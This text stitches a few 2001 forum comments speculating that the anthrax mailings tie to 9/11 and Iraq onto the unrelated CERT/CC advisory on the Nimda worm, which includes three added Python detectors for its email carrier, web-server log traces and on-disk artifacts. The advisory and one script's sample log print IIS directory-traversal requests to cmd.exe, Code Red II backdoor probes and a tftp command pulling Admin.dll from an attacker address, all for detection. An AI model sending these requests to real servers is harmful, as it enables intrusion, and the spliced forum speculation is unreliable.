I agree completely. I'll be quite surprised if the anthrax mailings turn out to be unconnected to the 9/11 attacks and probably Iraq.

22 posted on 11/16/2001 1:07:24 PM PST by Mitchell

To: bologna.com
You knew Eceshe in high school as well?

And she told ME I was the only one!!!

23 posted on 11/16/2001 1:09:57 PM PST by AgThorn

To: Mitchell
I agree completely. I'll be quite surprised if the anthrax mailings turn out to be unconnected to the 9/11 attacks and probably Iraq.
Careful with the quick agreement ... someone will be sizing ME up for a tinfoil hat soon!! ;-)
24 posted on 11/16/2001 1:10:37 PM PST by AgThorn

Comment #25 Removed by Moderator


Original release date: September 18, 2001
Revised: September 25, 2001
Source: CERT/CC

A complete revision history is at the end of this file.

Systems Affected

  • Systems running Microsoft Windows 95, 98, ME, NT, and 2000

Overview

The CERT/CC has received reports of new malicious code known as the "W32/Nimda worm" or the "Concept Virus (CV) v.5." This new worm appears to spread by multiple mechanisms: email, open network shares, browsing of compromised web servers, and active scanning for vulnerable IIS servers (each described in Section I below).

The worm modifies web documents (e.g., .htm, .html, and .asp files) and certain executable files found on the systems it infects, and creates numerous copies of itself under various file names.

We have also received reports of denial of service as a result of network scanning and email propagation.

I. Description

The Nimda worm has the potential to affect both user workstations (clients) running Windows 95, 98, ME, NT, or 2000 and servers running Windows NT and 2000.

Email Propagation

This worm propagates through email arriving as a MIME "multipart/alternative" message consisting of two sections. The first section is defined as MIME type "text/html", but it contains no text, so the email appears to have no content. The second section is defined as MIME type "audio/x-wav", but it contains a base64-encoded attachment named "readme.exe", which is a binary executable.

Due to a vulnerability described in CA-2001-06 (Automatic Execution of Embedded MIME Types), any mail software running on an x86 platform that uses Microsoft Internet Explorer 5.5 SP1 or earlier (except IE 5.01 SP2) to render the HTML mail automatically runs the enclosed attachment and, as a result, infects the machine with the worm. Thus, in vulnerable configurations, the worm payload will automatically be triggered by simply opening (or previewing) this mail message. As an executable binary, the payload can also be triggered by simply running the attachment.

The email message delivering the Nimda worm appears to also have the following characteristics:

  • The text in the subject line of the mail message appears to be variable.

  • There appear to be many slight variations in the attached binary file, causing the MD5 checksum to be different when one compares different attachments from different email messages. However, the file length of the attachment appears to consistently be 57344 bytes.

The worm also contains code that will attempt to resend the infected email messages every 10 days.
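The carrier message described above has a structure that mail gateways can recognise without a signature: an alternative part that claims to be HTML but is empty, next to a part labelled with a benign media type that decodes to a Win32 executable. The following detector is an added example, not CERT/CC code. It builds a constructed message with that shape (the attachment body is an "MZ" header padded to the advisory's 57344 bytes, a stand-in rather than the worm) and a benign message for comparison, then reports the mismatches it finds. The executable-extension list and the quarantine rule in is_nimda_like are assumptions of this example.

```python
"""Flag email messages shaped like the Nimda carrier: a multipart/alternative
message whose text/html part is empty and whose second part is labelled
audio/x-wav yet carries a base64-encoded Win32 executable.
Added example, not CERT/CC code. The sample attachment is a constructed
stand-in (an 'MZ' header padded to 57344 bytes), not the worm."""
import email
from email import encoders, policy
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

NIMDA_ATTACHMENT_LENGTH = 57344                       # from the advisory
EXECUTABLE_EXTENSIONS = (".exe", ".com", ".scr", ".pif", ".bat")  # assumption


def build_sample_message() -> bytes:
    """Constructed message with the structure the advisory describes."""
    msg = MIMEMultipart("alternative")
    msg["From"] = "sender@example.test"
    msg["To"] = "victim@example.test"
    msg["Subject"] = "readme"
    msg.attach(MIMEText("", "html"))            # first part: empty text/html
    part = MIMEBase("audio", "x-wav")           # second part: mislabelled binary
    part.set_payload(b"MZ" + b"\x00" * (NIMDA_ATTACHMENT_LENGTH - 2))
    encoders.encode_base64(part)
    part.add_header("Content-Disposition", "attachment", filename="readme.exe")
    msg.attach(part)
    return msg.as_bytes()


def build_benign_message() -> bytes:
    """Ordinary multipart/alternative message for comparison."""
    msg = MIMEMultipart("alternative")
    msg["From"] = "sender@example.test"
    msg["To"] = "victim@example.test"
    msg["Subject"] = "meeting notes"
    msg.attach(MIMEText("Notes are in the HTML version.", "plain"))
    msg.attach(MIMEText("<p>Notes are in the HTML version.</p>", "html"))
    return msg.as_bytes()


def suspicious_reasons(raw: bytes) -> list:
    """Return the Nimda-like traits found in a raw RFC 822 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    reasons = []
    if msg.get_content_type() != "multipart/alternative":
        return reasons
    for part in msg.iter_parts():
        ctype = part.get_content_type()
        filename = (part.get_filename() or "").lower()
        if ctype == "text/html" and not part.get_content().strip():
            reasons.append("empty text/html alternative")
            continue
        if ctype.startswith("text/"):
            continue
        data = part.get_content()               # decoded bytes for non-text parts
        if filename.endswith(EXECUTABLE_EXTENSIONS):
            reasons.append(f"{ctype} part carries executable name {filename}")
        if data[:2] == b"MZ":
            reasons.append(f"{ctype} payload has a Win32 MZ header")
        if len(data) == NIMDA_ATTACHMENT_LENGTH:
            reasons.append("payload length matches Nimda's 57344 bytes")
    return reasons


def is_nimda_like(raw: bytes) -> bool:
    """Quarantine rule (assumption): a non-text part with an MZ header next
    to an empty HTML alternative. The length check is corroborating only,
    since the advisory notes the binary varies between messages."""
    reasons = suspicious_reasons(raw)
    return (any("MZ header" in r for r in reasons)
            and any("empty text/html" in r for r in reasons))


if __name__ == "__main__":
    for reason in suspicious_reasons(build_sample_message()):
        print("-", reason)
    print("nimda-like:", is_nimda_like(build_sample_message()))
    print("benign flagged:", is_nimda_like(build_benign_message()))
```

The rule deliberately keys on the content-type/payload mismatch rather than on the file length or the name "readme.exe", since the advisory notes the binary itself varies from message to message; the length match is reported only as corroboration.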

Payload

The email addresses targeted for receiving the worm are harvested from two sources:

  • the .htm and .html files in the user's web cache folder
  • the contents of the user's email messages retrieved via the MAPI service

These files are passed through a simple pattern matcher which collects strings that look like email addresses. These addresses then receive a copy of the worm as a MIME-encoded email attachment. Nimda stores the time the last batch of emails was sent in the Windows registry, and every 10 days will repeat the process of harvesting addresses and sending the worm via email.

Likewise, the client machines begin scanning for vulnerable IIS servers. Nimda looks for backdoors left by previous IIS worms: Code Red II [IN-2001-09] and sadmind/IIS worm [CA-2001-11]. It also attempts to exploit various IIS Directory Traversal vulnerabilities (VU#111677 and CA-2001-12). The selection of potential target IP addresses follows these rough probabilities:

  • 50% of the time, an address with the same first two octets will be chosen
  • 25% of the time, an address with the same first octet will be chosen
  • 25% of the time, a random address will be chosen

The infected client machine attempts to transfer a copy of the Nimda code via tftp (69/UDP) to any IIS server that it scans and finds to be vulnerable.

Once running on the server machine, the worm traverses each directory in the system (including all those accessible through file shares) and writes a MIME-encoded copy of itself to disk using file names with .eml or .nws extensions (e.g., readme.eml). When a directory containing web content (e.g., HTML or ASP files) is found, the following snippet of JavaScript code is appended to every one of these web-related files:

Example: Javascript snippet

This modification of web content allows further propagation of the worm to new clients through a web browser or through the browsing of a network file system.

In order to further expose the machine, the worm

  • enables the sharing of the c: drive as C$
  • creates a "Guest" account on Windows NT and 2000 systems
  • adds this account to the "Administrator" group.

Furthermore, the Nimda worm infects existing binaries on the system by creating Trojan horse copies of legitimate applications. These Trojan horse versions of the applications will first execute the Nimda code (further infecting the system and potentially propagating the worm), and then complete their intended function.

Browser Propagation

As part of the infection process, the Nimda worm modifies all web content files it finds (including, but not limited to, files with .htm, .html, and .asp extensions). As a result, any user browsing web content on the system, whether via the file system or via a web server, may download a copy of the worm. Some browsers may automatically execute the downloaded copy, thereby infecting the browsing system.

File System Propagation

The Nimda worm creates numerous MIME-encoded copies of itself (using file names with .eml and .nws extensions) in all writable directories (including those found on a network share) to which the user has access. If a user on another system subsequently selects the copy of the worm file on the shared network drive in Windows Explorer with the preview option enabled, the worm may be able to compromise that system.

Additionally, by creating Trojan horse versions of legitimate applications already installed on the system, users may unknowingly trigger the worm when attempting to make use of these programs.

System Footprint

The scanning activity of the Nimda worm produces the following log entries for any web server listening on port 80/tcp:

  GET /scripts/root.exe?/c+dir
  GET /MSADC/root.exe?/c+dir
  GET /c/winnt/system32/cmd.exe?/c+dir
  GET /d/winnt/system32/cmd.exe?/c+dir
  GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
  GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
  GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
  GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

Note: The first four entries in these sample logs denote attempts to connect to the backdoor left by Code Red II, while the remaining log entries are examples of exploit attempts for the Directory Traversal vulnerability.
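The footprint above is easy to hunt for in web server logs, but the interesting part is the encoding: the traversal appears as %5c, as an overlong two-byte UTF-8 sequence (\xc0\xaf, \xc1\x1c, \xc1\x9c), or as a plain "../", so a detector has to normalise the path the way a permissive decoder would before looking for "../". The classifier below is an added example, not CERT/CC code; it also picks out the tftp transfer line that the Solutions section lists as an indicator, where only a 200 status means the command ran. The log lines are constructed in a simplified W3C extended format (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status) using documentation addresses, and the category names are this example's own.

```python
"""Classify IIS web-server log lines for the Nimda scanning footprint and the
tftp transfer indicator described in the advisory. Added example, not CERT/CC
or Microsoft code; the log lines are constructed in a simplified W3C extended
format (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status)."""
from collections import Counter
from urllib.parse import unquote_to_bytes

# Constructed sample log. The request paths mirror the advisory's footprint;
# 192.0.2.10 plays the scanning host, 198.51.100.7 an ordinary visitor.
SAMPLE_LOG = r"""
2001-09-18 14:12:03 192.0.2.10 GET /scripts/root.exe /c+dir 404
2001-09-18 14:12:04 192.0.2.10 GET /MSADC/root.exe /c+dir 404
2001-09-18 14:12:05 192.0.2.10 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 14:12:06 192.0.2.10 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2001-09-18 14:12:07 192.0.2.10 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 14:12:08 192.0.2.10 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 14:12:09 192.0.2.10 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+tftp%20-i%20192.0.2.10%20GET%20Admin.dll%20d:\Admin.dll 200
2001-09-18 14:13:00 198.51.100.7 GET /index.html - 200
2001-09-18 14:13:01 198.51.100.7 GET /images/logo.gif - 200
"""


def fold_overlong(raw: bytes) -> str:
    """Collapse two-byte overlong UTF-8 sequences (lead byte 0xC0/0xC1) onto
    the ASCII byte they encode, as a permissive decoder would: %c0%af -> '/',
    %c1%1c and %c1%9c -> '\\'. Other bytes pass through unchanged."""
    out = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return out.decode("latin-1")


def normalize_path(stem: str) -> str:
    """Percent-decode the URI stem, fold overlong encodings, and map
    backslashes to slashes so every traversal form reads as '../'."""
    return fold_overlong(unquote_to_bytes(stem)).replace("\\", "/")


def classify_line(line: str):
    """Return a finding dict for a Nimda-related request, or None."""
    fields = line.split()
    if len(fields) < 7:
        return None
    date, clock, ip, _method, stem, query, status = fields[:7]
    stem_l, query_l = stem.lower(), query.lower()
    finding = {"time": f"{date} {clock}", "ip": ip, "status": int(status),
               "normalized": normalize_path(stem)}
    if "tftp" in query_l and "admin.dll" in query_l:
        # Worm body fetched via tftp; only a 200 result means the command ran.
        finding["category"] = "tftp-worm-transfer"
        finding["success"] = finding["status"] == 200
    elif stem_l.endswith("/root.exe"):
        # Probe for the backdoor left by Code Red II or sadmind/IIS.
        finding["category"] = "codered2-backdoor-probe"
    elif "cmd.exe" in stem_l and "../" in finding["normalized"]:
        finding["category"] = "directory-traversal"
    else:
        return None
    return finding


def scan_log(text: str) -> list:
    return [f for f in (classify_line(ln) for ln in text.splitlines()) if f]


def summarize(text: str) -> Counter:
    return Counter(f["category"] for f in scan_log(text))


def scanning_hosts(text: str) -> set:
    return {f["ip"] for f in scan_log(text)}


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["ip"], f["category"], f["status"], f["normalized"])
    print(dict(summarize(SAMPLE_LOG)))
```

Because the match is made on the normalised path rather than on the literal encodings in the advisory's list, the same rule catches the %2f, %5c and overlong variants alike; the raw stem is kept in the finding so an analyst can still see which encoding the scanner used.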

II. Impact

Intruders can execute arbitrary commands within the LocalSystem security context on machines running the unpatched versions of IIS. In the case where a client is compromised, the worm will be run with the same privileges as the user who triggered it. Hosts that have been compromised are also at high risk for being party to attacks on other Internet sites.

The high scanning rate of the Nimda worm may also cause bandwidth denial-of-service conditions on networks with infected machines.

III. Solutions

Recommendations for System Administrators of IIS machines

To determine if your system has been compromised, look for the following:

  • a root.exe file (indicates a compromise by Code Red II or sadmind/IIS worms making the system vulnerable to the Nimda worm)
  • an Admin.dll file in the root directory of c:\, d:\, or e:\ (Note that the file name Admin.dll may be legitimately installed by IIS in other directories.)
  • unexpected .eml or .nws files in numerous directories
  • the presence of this string: /c+tftp%20-i%20x.x.x.x%20GET%20Admin.dll%20d:\Admin.dll 200 in the IIS logs, where "x.x.x.x" is the IP address of the attacking system. (Note that only the "200" result code indicates success of this command.)
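The on-disk indicators in the list above can be swept for automatically, with one subtlety the advisory calls out: Admin.dll is only suspicious in a drive root, since IIS may legitimately install a file of that name elsewhere. The sweep below is an added example, not CERT/CC code. It builds a constructed directory tree under a temporary directory that stands in for a drive root such as c:\ (so it runs on any OS), walks it, and applies the advisory's three file-based checks; the decision threshold of "worm copies in at least three directories" is this example's own assumption for "numerous directories".

```python
"""Sweep a directory tree for the on-disk Nimda indicators from the advisory:
root.exe anywhere, Admin.dll in the drive root only, and .eml/.nws worm
copies spread across directories. Added example, not CERT/CC code; the tree
it scans is constructed under a temporary directory standing in for c:\."""
import os
import tempfile
from collections import defaultdict

ROOT_EXE = "root.exe (Code Red II / sadmind backdoor)"
ADMIN_DLL = "Admin.dll in drive root"
MIME_COPIES = "MIME copies (.eml/.nws)"
WORM_COPY_EXTENSIONS = (".eml", ".nws")


def build_sample_tree() -> str:
    """Constructed layout: three true indicators plus an Admin.dll in a
    non-root directory that must NOT be counted."""
    root = tempfile.mkdtemp(prefix="nimda-sweep-")
    layout = {
        "Admin.dll": b"",
        "inetpub/scripts/root.exe": b"",
        "inetpub/wwwroot/readme.eml": b"",
        "inetpub/wwwroot/docs/readme.eml": b"",
        "winnt/temp/readme.nws": b"",
        "Program Files/Common Files/Admin.dll": b"",   # legitimate location
        "inetpub/wwwroot/index.html": b"<html></html>",
    }
    for rel, data in layout.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return root


def find_nimda_artifacts(drive_root: str) -> dict:
    """Return {indicator: [paths]}. Name comparison is case-insensitive to
    match Windows semantics even when run on a case-sensitive file system."""
    hits = defaultdict(list)
    root_abs = os.path.abspath(drive_root)
    for dirpath, _dirs, files in os.walk(drive_root):
        in_root = os.path.abspath(dirpath) == root_abs
        for name in files:
            lower = name.lower()
            path = os.path.join(dirpath, name)
            if lower == "root.exe":
                hits[ROOT_EXE].append(path)
            elif lower == "admin.dll" and in_root:
                hits[ADMIN_DLL].append(path)
            elif lower.endswith(WORM_COPY_EXTENSIONS):
                hits[MIME_COPIES].append(path)
    return dict(hits)


def is_compromised(hits: dict, min_copy_dirs: int = 3) -> bool:
    """Decision rule. A backdoor or root Admin.dll is conclusive on its own;
    worm copies count once they appear in several directories (threshold is
    an assumption of this example, not a figure from the advisory)."""
    if hits.get(ROOT_EXE) or hits.get(ADMIN_DLL):
        return True
    copy_dirs = {os.path.dirname(p) for p in hits.get(MIME_COPIES, [])}
    return len(copy_dirs) >= min_copy_dirs


if __name__ == "__main__":
    sample_root = build_sample_tree()
    found = find_nimda_artifacts(sample_root)
    for indicator, paths in found.items():
        print(indicator)
        for p in paths:
            print("   ", os.path.relpath(p, sample_root))
    print("compromised:", is_compromised(found))
```

On a real host the function would be pointed at each drive root in turn (c:\, d:\, e:\ as the advisory lists them); a positive result is a reason to follow the reinstall-from-trusted-media guidance that follows, not a reason to clean individual files.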

The only safe way to recover from the system compromise is to format the system drive(s) and reinstall the system software from trusted media (such as vendor-supplied CD-ROM). Additionally, after the software is reinstalled, all vendor-supplied security patches must be applied. The recommended time to do this is while the system is not connected to any network. However, if sufficient care is taken to disable all server network services, then the patches can be downloaded from the Internet.

Detailed instructions for recovering your system can be found in the CERT/CC tech tip:

Steps for Recovering from a UNIX or NT System Compromise

Apply the appropriate patch from your vendor

A cumulative patch which addresses all of the IIS-related vulnerabilities exploited by the Nimda worm is available from Microsoft at

http://www.microsoft.com/technet/security/bulletin/MS01-044.asp

Recommendations for Network Administrators

Ingress filtering

Ingress filtering manages the flow of traffic as it enters a network under your administrative control. Servers are typically the only machines that need to accept inbound connections from the public Internet. In the network usage policy of many sites, there are few reasons for external hosts to initiate inbound connections to machines that provide no public services. Thus, ingress filtering should be performed at the border to prohibit externally initiated inbound connections to non-authorized services. With Nimda, ingress filtering of port 80/tcp could prevent instances of the worm outside of your network from scanning or infecting vulnerable IIS servers in the local network that are not explicitly authorized to provide public web services. Filtering of port 69/udp will also prevent the downloading of the worm to IIS via tftp.

Cisco has published a tech tip specifically addressing filtering guidelines to mitigate the impact of the Nimda worm at

http://www.cisco.com/warp/public/63/nimda.shtml

Egress filtering

Egress filtering manages the flow of traffic as it leaves a network under your administrative control. There is typically limited need for machines providing public services to initiate outbound connections to the Internet. In the case of Nimda, employing egress filtering on port 69/udp at your network border will prevent certain aspects of the worm's propagation both to and from your network.

Recommendations for End User Systems

Apply the appropriate patch from your vendor

If you are running a vulnerable version of Internet Explorer (IE), the CERT/CC recommends upgrading to at least version 5.0 since older versions are no longer officially maintained by Microsoft. Users of IE 5.0 and above are encouraged to apply the patch for the "Automatic Execution of Embedded MIME Types" vulnerability available from Microsoft at

http://www.microsoft.com/technet/security/bulletin/MS01-020.asp

Note: IE 5.5 SP1 users should apply the patches discussed in MS01-027

Run and Maintain an Anti-Virus Product

It is important for users to update their anti-virus software. Most anti-virus software vendors have released updated information, tools, or virus databases to help detect and partially recover from this malicious code. A list of vendor-specific anti-virus information can be found in Appendix A.

Many anti-virus packages support automatic updates of virus definitions. We recommend using these automatic updates when available.

Don't open e-mail attachments

The Nimda worm may arrive as an email attachment named "readme.exe". Users should not open this attachment.

Disable JavaScript

End-user systems can become infected with the Nimda worm by browsing web sites hosted by infected servers. This method of infection requires the use of JavaScript to be successful. Therefore, the CERT/CC recommends that end user systems disable JavaScript until all appropriate patches have been applied and anti-virus software has been updated.

Appendix A. Vendor Information

Antivirus Vendor Information

Aladdin Knowledge Systems

http://www.eSafe.com/home/csrt/valerts2.asp?virus_no=10087

Central Command, Inc.

http://support.centralcommand.com/cgi-bin/command.cfg/php/enduser/std_adp.php?p_refno=010918-000005

Command Software Systems

http://www.commandsoftware.com/virus/nimda.html

Computer Associates

http://www.ca.com/virusinfo/encyclopedia/descriptions/n/nimda.htm

F-Secure Corp

http://www.fsecure.com/v-descs/nimda.shtml

McAfee

http://vil.mcafee.com/dispVirus.asp?virus_k=99209&

Panda Software

http://service.pandasoftware.es/library/card.jsp?Virus=Nimda

Proland Software

http://www.pspl.com/virus_info/worms/nimda.htm

Sophos

http://www.sophos.com/virusinfo/analyses/w32nimdaa.html

Symantec

http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html

Trend Micro

http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A

http://www.antivirus.com/pc-cillin/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A

References

You may wish to visit the CERT/CC's computer virus resources page located at

http://www.cert.org/other_sources/viruses.html
